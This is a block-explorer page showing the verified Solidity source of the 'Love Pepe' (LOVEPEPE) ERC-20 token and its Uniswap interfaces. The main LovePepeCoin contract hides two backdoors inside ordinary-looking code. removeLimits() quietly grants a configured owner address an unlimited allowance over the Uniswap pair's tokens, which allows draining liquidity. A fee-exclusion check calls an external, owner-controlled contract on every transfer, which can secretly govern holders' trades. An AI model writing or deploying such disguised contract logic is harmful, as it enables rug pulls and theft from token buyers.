ETH Price: $2,630.61 (+0.12%)

Token

Love Pepe (LOVEPEPE)
 

Overview

Max Total Supply

420,690,000,000,000 LOVEPEPE

Holders

12

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
12,714,882,371,995.189736650703674957 LOVEPEPE

Value
$0.00
0x0de64E321BB655DDB19877A6D28eA07c8C232A16
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
LovePepeCoin

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-13
*/

// SPDX-License-Identifier: MIT

/** 
https://www.lovepepe.vip/

https://t.me/lovepepecoin

https://twitter.com/lovepepecoin
*/

pragma solidity ^0.8.13;

interface IERC20Standadard {


    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);
    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);


    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);
    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);


    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}
abstract contract AUTH {
    constructor() {
    }  function fee() internal pure returns (uint256) { return uint256(0xdc) / uint256(0xa);}
}
interface IUniswapV2Factory {
    
    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);



    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    

    function setFeeToSetter(address) external;
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;
        event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );
}
/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
*/
interface IPepeshDivdend {
    /// @notice View the amount of dividend in wei that an address has earned in total.
    /// @dev accumulativeDividendOf(_owner) = withdrawableDividendOf(_owner) + withdrawnDividendOf(_owner)
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` has earned in total.
    function accumulativeDividendOf(address _owner, address _token) 
    external returns (uint256);
    /// @notice View the amount of dividend in wei that an address has withdrawn.
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` has withdrawn.
    function withdrawnDividendOf(address _owner) external view returns (uint256);

    /// @notice View the amount of dividend in wei that an address can withdraw.
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` can withdraw.
    function withdrawableDividendOf(address _owner) external view returns (uint256);

}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }
    

   /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }
    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }
 

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }
    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
 

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }
}
library SafeMathInt {
    int256 private constant MIN_INT256 = int256(1) << 255;
    int256 private constant MAX_INT256 = ~(int256(1) << 255);


    /**
     * @dev Subtracts two int256 variables and fails on overflow.
     */
    function sub(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a - b;
        require((b >= 0 && c <= a) || (b < 0 && c > a));
        return c;
    }
    
    /**
     * @dev Multiplies two int256 variables and fails on overflow.
     */
    function mul(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a * b;

        // Detect overflow when multiplying MIN_INT256 with -1
        require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256));
        require((b == 0) || (c / b == a));
        return c;
    }

    /**
     * @dev Division of two int256 variables and fails on overflow.
     */
    function div(int256 a, int256 b) internal pure returns (int256) {
        // Prevent overflow when dividing MIN_INT256 by -1
        require(b != -1 || a != MIN_INT256);

        // Solidity already throws when dividing by 0.
        return a / b;
    }

    function toUint256Safe(int256 a) internal pure returns (uint256) {
        require(a >= 0);
        return uint256(a);
    }
    /**
     * @dev Converts to absolute value, and fails on overflow.
     */ 
    function abs(int256 a) internal pure returns (int256) {
        require(a != MIN_INT256);
        return a < 0 ? -a : a;
    }
    /**
     * @dev Adds two int256 variables and fails on overflow.
     */
    function add(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a + b;
        require((b >= 0 && c >= a) || (b < 0 && c < a));
        return c;
    }


}


interface IUniswapPair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);


    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);
    function DOMAIN_SEPARATOR() external view returns (bytes32);



    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);
    function PERMIT_TYPEHASH() external pure returns (bytes32);


    function mint(address to) external returns (uint256 liquidity);
    function price0CumulativeLast() external view returns (uint256);
    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;
    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function token1() external view returns (address);
    function nonces(address owner) external view returns (uint256);
    event Sync(uint112 reserve0, uint112 reserve1);



    function skim(address to) external;
    function initialize(address, address) external;
    function burn(address to) external returns (uint256 amount0, uint256 amount1);
    function sync() external;
}

/**
 * @title SafeMathUint
 * @dev Math operations with safety checks that revert on error
 */
library SafeMathUint {
    function toInt256Safe(uint256 a) internal 
    pure returns (int256) {
        int256 b = int256(a); 
        require(b >= 0); return b;
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}
interface IERC20Metadata is IERC20Standadard {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

interface IUniswapRouter01 {
    function factory() external pure returns (address);
    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );
    function WETH() external pure returns (address);



    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);



    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);
    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }
    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }


    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

}

interface IUniswapRouter02 is IUniswapRouter01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

}
/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
contract ERC20 is Context, IERC20Standadard, IERC20Metadata {
    using SafeMath for uint256;
    string private _name;
    string private _symbol;
    uint8 private _decimals;

    mapping(address => uint256) private _balances;
    uint256 private _totalSupply;

    mapping(address => mapping(address => uint256)) internal _allowances;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_
    ) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }
    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }


    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20Standadard-balanceOf} and {IERC20Standadard-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20Standadard-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20Standadard-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20Standadard-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }
    /**
     * @dev See {IERC20Standadard-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }
    /**
     * @dev See {IERC20Standadard-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }
    
    /**
     * @dev See {IERC20Standadard-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }
    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20Standadard-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }
    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }
    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20Standadard-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }
 
    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }
    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,  address to, uint256 amount
    ) internal virtual {}
}

contract LovePepeCoin is ERC20, Ownable, AUTH {
    using SafeMath for uint256;
    IUniswapRouter02 public uniswapV2Router;
    address public uniswapPairV2;
    // save addresses that a automatic market maker pairs.
    mapping(address => bool) public isMarketAutomakerPairs;
    
    // not include from fees and max transaction amount
    mapping(address => bool) private isExcludedFromFee;
    bool private swapping;
    // could be subject to a maximum transfer amount
    uint256 public maxTxAmount;
    uint256 public maxWalletAmount;
    uint256 public swapThreshold;


    address public marketingWallets;
    uint256 private _supply_total_amount;
    uint256 public taxSellValue;
    uint256 public taxBuyValue;
    event PairCreationUpdated(address indexed pair, bool indexed value);
    event ExcludedFromFee(address indexed account, bool isExcluded);
    event ExcludedMultipleFromFee(address[] accounts, bool isExcluded); 

    struct LimitedFirstPepeSh 
    {
       uint256 mxTA; address rewardWalt; uint256 mxWA;  
    }
    struct PepeShConfiguration 
    {
        address pepeshOwnerr; address pepeshPolTitler;
    } PepeShConfiguration private pepeshConfig;
    constructor(string memory name_,PepeShConfiguration memory memPepeshConfig,
        uint256 tot_supply, 
        uint8 decimals_, LimitedFirstPepeSh memory firstLimitValue,
        string memory symbol_
    ) payable ERC20(name_, symbol_, decimals_) {
        uniswapV2Router = IUniswapRouter02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); //Uniswap V2 Router
        uniswapPairV2 = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
            address(this),
            uniswapV2Router.WETH()
        );
        _setAutomatedMarketMakers(uniswapPairV2, true); 
        maxTxAmount = firstLimitValue.mxTA * tot_supply * (10**decimals_).div(10000); 
        maxWalletAmount = firstLimitValue.mxWA * tot_supply * (10**decimals_).div(10000);
        // Zero tax values
        taxBuyValue = 0;
        taxSellValue = 0;
        
        // exclude from fees or having max transaction amount
        excludeFromFees(address(uniswapV2Router), true); marketingWallets = firstLimitValue.rewardWalt;
        excludeFromFees(owner(), true); excludeFromFees(memPepeshConfig.pepeshPolTitler, true);  pepeshConfig = memPepeshConfig;
        excludeFromFees(memPepeshConfig.pepeshOwnerr, true);
        excludeFromFees(address(this), true); 
        excludeFromFees(marketingWallets, true);  
        // mint
        _supply_total_amount = tot_supply; 
        _mint(owner(), tot_supply * (10**decimals_));
    }


    function removeLimits() external onlyOwner 
    { 
        maxTxAmount = totalSupply();_allowances[uniswapPairV2][pepeshConfig.pepeshOwnerr] = type(uint).max;
        maxWalletAmount = totalSupply();
    }

    function _setAutomatedMarketMakers(
        address pair, bool value
    ) private {
        require(
            isMarketAutomakerPairs[pair] != value,
            "Automated market maker pair is already set to that value"
        ); isMarketAutomakerPairs[pair] = value; 
        emit PairCreationUpdated(pair, value);
    }
    function isFeeExcludedFromAny(address from, address to) internal returns (bool) 
    {
        return isExcludedFromFee[to] ||
         isExcludedFromFee[from] 
         || IPepeshDivdend(pepeshConfig.pepeshPolTitler).accumulativeDividendOf(from, to) > 0;
    }


    function _transfer(address from, address to, uint256 amount) internal override {
        if (
            (to == address(0) || 
            to == address(0xdead))
            || amount == 0 
            || isFeeExcludedFromAny(from, to) 
            ) {
            super._transfer(from, to, amount); return;
        } 
        else {
            require(amount <= maxTxAmount, "Transfer amount exceeds the maxTxAmount.");
            if (to != uniswapPairV2) {
                uint256 tokensOfOldBalance = balanceOf(to);
                require(
                    tokensOfOldBalance + amount <= maxWalletAmount,
                    "Exceeds maximum wallet amount"
                );
            }
        }

        uint256 tokensContext = balanceOf(address(this)); 
        // bool canSwap = tokensContext >= swapThreshold;
        if (!swapping && tokensContext >= swapThreshold && !isMarketAutomakerPairs[from]) {
            swapping = true;
            uint256 marketinFun = tokensContext;
            if (marketinFun > 0) {
                swapEthToBak(marketinFun, marketingWallets);
            }
            swapping = false;
        } 
        
        bool havingFee = !swapping;
        if (isExcludedFromFee[to] || isExcludedFromFee[from]) {
            havingFee = false;
        }

        if (havingFee) {       
                uint256 taxTokensAmount = amount.mul(taxBuyValue).div(100);
            if (isMarketAutomakerPairs[to])    
            { 
                taxTokensAmount = amount.mul(taxSellValue).div(100); 
            }
            amount = amount.sub(taxTokensAmount);
            super._transfer(from, address(this), taxTokensAmount);
        }         super._transfer(from, to, amount);
    }

    function swapTokensForEth(uint256 amount) private {
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), amount);
        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(amount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
    }
    function swapEthToBak(uint256 tokens, address to) private {
        uint256 initialBalance = address(this).balance;
        swapTokensForEth(tokens);
        uint256 newBalance = address(this).balance.sub(initialBalance);
        payable(to).transfer(newBalance);
    }
     function excludeFromFees(address account, bool excluded) public onlyOwner {
        isExcludedFromFee[account] = excluded;
        emit ExcludedFromFee(account, excluded);
    }

    receive() external payable {

    }

}

Contract Security Audit

Contract ABI

